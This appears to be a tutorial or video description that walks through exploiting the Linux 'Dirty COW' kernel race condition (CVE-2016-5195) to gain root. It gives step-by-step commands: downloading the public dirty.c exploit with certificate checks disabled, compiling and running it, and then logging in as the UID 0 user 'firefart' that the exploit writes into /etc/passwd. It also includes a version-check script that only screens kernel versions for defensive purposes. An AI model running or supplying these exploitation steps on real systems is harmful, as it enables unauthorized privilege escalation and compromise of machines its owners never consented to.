Published on March 5th, 2017

Kernel Dirty COW local root exploit Demonstration

This video is intended for educational purposes, to raise awareness of a serious bug (Dirty COW) in the Linux kernel among tech geeks and Linux enthusiasts.

If anyone uses this attack to cause serious harm, I will not be responsible for it.

##### Local Privilege Escalation #####

1. Hi guys, today we are discussing Local Privilege Escalation using the Dirty COW bug in the Linux kernel. The Exploit-DB entry used below is titled for kernels "2.6.22 to 3.9", but the bug is present in every unpatched kernel from 2.6.22 up to the upstream fix, which shipped in mainline 4.8.3 and the 4.7.9 and 4.4.26 stable releases in October 2016. Distributions backported the fix to their own kernels without changing the version number, so always check the vendor advisory rather than trusting the version string alone.

2. What is this attack?

A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. In practice the exploit maps a root-owned file (here /etc/passwd) read-only and private, then races a write into that mapping (through /proc/self/mem or, in the exploit used here, ptrace(PTRACE_POKEDATA)) against madvise(MADV_DONTNEED) on the same pages until the write lands in the page cache instead of a private copy, so the file on disk changes.

-----------------------------------------------------------------------------

Kernel Local Privilege Escalation "Dirty COW" - CVE-2016-5195

https://access.redhat.com/security/vulnerabilities/DirtyCow

Linux Kernel 2.6.22 to 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)

https://www.exploit-db.com/exploits/40839/

------------------------------------------------------------------------------

3. You can download Red Hat's script for checking whether the kernel is vulnerable from the Red Hat portal above with the command below. Note that the script is written for Red Hat kernels and checks the installed kernel package version; on other distributions consult that vendor's advisory.

$wget 'https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh'

4. Run the script to check whether the kernel is vulnerable.

$bash rh-cve-2016-5195_5.sh

5. If the output reports that your kernel version is vulnerable, we can escalate from a normal user to root using a simple C program.

6. Download dirty.c from the URL below:

$wget --no-check-certificate 'https://www.exploit-db.com/download/40839' -O 'dirty.c'

Now we need to compile this code with gcc. gcc is usually available, but it is not installed by default on every Linux system; if the command is missing, install it from your distribution's packages.

7. To compile the code with gcc:

$gcc -pthread dirty.c -o dirty -lcrypt

The command above creates an executable named dirty in the current directory. -pthread is needed because the exploit runs the racing loops in separate threads, and -lcrypt because it hashes the new password with crypt(3) before writing it into /etc/passwd.

8. Now start the attack by running the executable.

./dirty

It first backs up /etc/passwd to /tmp/passwd.bak, then overwrites the root entry at the top of /etc/passwd with a new UID 0 user 'firefart' whose password you supply when it runs. Because the original root line is replaced, restore the backup (mv /tmp/passwd.bak /etc/passwd) as soon as you are done; the exploit prints the same reminder on success.

9. Now you can log in as firefart with the password you provided.

$su - firefart
Password: your password

10. [firefart@localhost]#

Bang, you have root access on the system. Confirm with id, which reports uid 0.
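Steps 3 to 5 rely on Red Hat's checker, which only knows Red Hat kernel packages. As an added example (not part of the video or of Red Hat's script), here is a distribution-neutral first screen that parses a kernel version string and compares it against the upstream fixed versions named above (4.8.3, 4.7.9, 4.4.26). It assumes those three are the only fixed versions it needs; older longterm branches also received backports, and vendors patch without bumping the version, so "affected" here means "check the vendor advisory", not "confirmed exploitable".

```shell
#!/bin/sh
# Added example, not part of the original video or of Red Hat's script:
# a distribution-neutral first screen for CVE-2016-5195 based purely on
# the kernel version string.  Vendors backport the fix without bumping the
# version, so "affected" here means "check your vendor advisory", never
# "confirmed exploitable".

# vercmp A B: print -1, 0 or 1 for A<B, A=B, A>B on dotted numeric versions.
# Anything after the numeric prefix ("-31-generic", "-642.el6.x86_64") is
# ignored; a trailing dot is appended so cut always sees a delimiter.
vercmp() {
    a="$(printf '%s' "$1" | sed 's/[^0-9.].*//')."
    b="$(printf '%s' "$2" | sed 's/[^0-9.].*//')."
    i=1
    while [ "$i" -le 4 ]; do
        x=$(printf '%s' "$a" | cut -d. -f"$i")
        y=$(printf '%s' "$b" | cut -d. -f"$i")
        if [ -z "$x" ] && [ -z "$y" ]; then
            break
        fi
        x=${x:-0}
        y=${y:-0}
        if [ "$x" -lt "$y" ]; then echo -1; return 0; fi
        if [ "$x" -gt "$y" ]; then echo 1; return 0; fi
        i=$((i + 1))
    done
    echo 0
}

# dirtycow_affected VERSION: succeed (exit 0) when an upstream kernel with
# that version number is in the affected range, fail (exit 1) otherwise.
dirtycow_affected() {
    v=$1
    # The bug was introduced in 2.6.22; older kernels do not have it.
    if [ "$(vercmp "$v" 2.6.22)" -lt 0 ]; then
        return 1
    fi
    # Upstream fixes: mainline 4.8.3 and the 4.7.9 / 4.4.26 stable releases
    # (October 2016).  Assumption: longterm branches older than 4.4 that
    # received a backport are not listed here, so they are conservatively
    # reported as affected; add their fixed versions from the changelogs.
    case "$v" in
        4.4|4.4.*) fixed=4.4.26 ;;
        4.7|4.7.*) fixed=4.7.9 ;;
        *)         fixed=4.8.3 ;;
    esac
    [ "$(vercmp "$v" "$fixed")" -lt 0 ]
}

# check_running_kernel: screen the kernel this shell is running on.
check_running_kernel() {
    dirtycow_affected "$(uname -r)"
}

# Run with --self to screen the current machine.
if [ "${1:-}" = "--self" ]; then
    if check_running_kernel; then
        echo "$(uname -r): version is inside the Dirty COW range; check the vendor advisory"
    else
        echo "$(uname -r): version is past the upstream fix"
    fi
fi
```

The version comparison deliberately stops at the numeric prefix, so "4.4.0-31-generic" is judged as 4.4.0 and "2.6.32-642.el6.x86_64" as 2.6.32; the latter is exactly the case where a vendor backport makes the version string misleading, which is why the script's positive result is only a prompt to consult the advisory.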

Thanks for watching this video. I'm a Linux enthusiast who explores new attacks and memory leaks in the Linux kernel.

So subscribe to my channel for more educational videos on real attacks and exploitation.

I'll share all the above links in the description below.

Bye, have fun 😉
